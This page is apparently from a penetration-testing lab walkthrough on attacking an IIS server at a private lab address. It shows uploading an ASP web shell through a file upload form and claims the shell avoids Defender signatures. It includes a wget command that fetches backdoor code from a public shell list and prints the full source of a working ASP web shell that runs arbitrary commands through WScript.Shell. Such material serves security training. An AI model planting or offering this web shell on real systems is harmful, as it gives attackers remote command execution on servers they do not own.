IIS - webshell

  • There is a simple asp.net application on http://192.168.56.22/, this application only give us a simple file upload functionality.

  • From there we can upload a basic aspcmd in asp : aspcmd.asp (at the time of writing, this avoid defender signature)

aspcmd.asp

wget https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/asp/aspcmd.asp

cmd.asp

<%
Function getResult(theParam)
    Dim objSh, objResult
    Set objSh = CreateObject("WScript.Shell")
    Set objResult = objSh.exec(theParam)
    getResult = objResult.StdOut.ReadAll
end Function
%>
<HTML>
    <BODY>
        Enter command:
            <FORM action="" method="POST">
                <input type="text" name="param" size=45 value="<%= myValue %>">
                <input type="submit" value="Run">
            </FORM>
            <p>
        Result :
        <% 
        myValue = request("param")
        thisDir = getResult("cmd /c" & myValue)
        Response.Write(thisDir)
        %>
        </p>
        <br>
    </BODY>
</HTML>

  • The webshell is uploaded in the upload folder.

  • And we have a command execution on the IIS server

PreviousExploiting IIS & Privilege escalationNextPrivesc SeImpersonatePrivilege

Last updated